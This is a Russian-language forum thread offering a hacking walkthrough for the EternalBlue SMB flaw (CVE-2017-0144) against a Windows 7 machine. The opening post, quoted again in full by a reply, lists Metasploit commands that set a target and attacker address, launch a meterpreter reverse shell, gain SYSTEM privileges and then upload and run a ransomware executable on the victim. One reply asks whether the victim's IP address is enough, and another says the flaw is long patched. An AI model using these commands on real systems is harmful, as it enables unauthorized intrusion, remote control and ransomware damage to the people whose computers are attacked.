Подведи собственные итоги года совместно с YOUGAME и забери ценные призы! Перейти

EternalBlue - Взлом Windows PC

  • Автор темы Автор темы Drager
  • Дата начала Дата начала
Работающий пенсионер
Олдфаг
Олдфаг
Статус
Оффлайн
Регистрация
9 Авг 2016
Сообщения
1,426
Реакции
1,047
Привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США) или мой любимый Интерпол. Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года.


В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.

Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete. Этот эксплоит, как и оригинал, может не срабатывать с 100% шансом в течение определенного промежутка времени, и должен запускаться непрерывно до момента срабатывания.
Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

Код:
Expand Collapse Copy
> msfupdate

d726a3576ef2.png


Код:
Expand Collapse Copy
> msfconsole[/B][/B][/CENTER]
[B][B]
[CENTER]
> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit


5f4dd04d2c8b.png


Эксплоит срабатывает на отлично, получаем системные привилегии:
Код:
Expand Collapse Copy
> getsystem

> getuid

f5364ba1432d.png


Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

bf425295c4d8.png

Код:
Expand Collapse Copy
> upload /root/ransomware.exe C:\\

> shell

> cd C:\\

> ransomware.exe


a727cc53c0ac.png


И как итог:

424d618d9c04.png


Вот собственно, и все. Спасибо за внимание.
 
А что нужно? просто знать ип адрес жертвы или как?
 
Привет! Наверняка многие из вас слышали про EternalBlue (или ETERNALBLUE[1], CVE-2017-0144) — кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США) или мой любимый Интерпол. Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года.


В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.


Приступим к осуществлению, в качестве атакующего хоста Kali Linux 2017.1, в качестве цели Windows 7.

Код:
Expand Collapse Copy
> msfupdate

d726a3576ef2.png


Код:
Expand Collapse Copy
> msfconsole[/B][/B][/CENTER][/B][/B][/CENTER]
[B][B][CENTER][B][B]
[CENTER]
> use exploit/windows/smb/ms17_010_eternalblue

> msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.105

> msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

> msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

> msf exploit(ms17_010_eternalblue) >exploit



5f4dd04d2c8b.png


Эксплоит срабатывает на отлично, получаем системные привилегии:
Код:
Expand Collapse Copy
> getsystem

> getuid

f5364ba1432d.png


Немного усугубим ситуацию, закинув целевому хосту вирус-вымогатель (аналог WannaCry)

bf425295c4d8.png

Код:
Expand Collapse Copy
> upload /root/ransomware.exe C:\\

> shell

> cd C:\\

> ransomware.exe


a727cc53c0ac.png


И как итог:

424d618d9c04.png


Вот собственно, и все. Спасибо за внимание.
Достаточно давно устаревший способ, даже на момент написания гайда, уязвимость была пофикшена в обновах, так что даже на тот момент можно было взломать только комп своей бабушки.
 
Назад
Сверху Снизу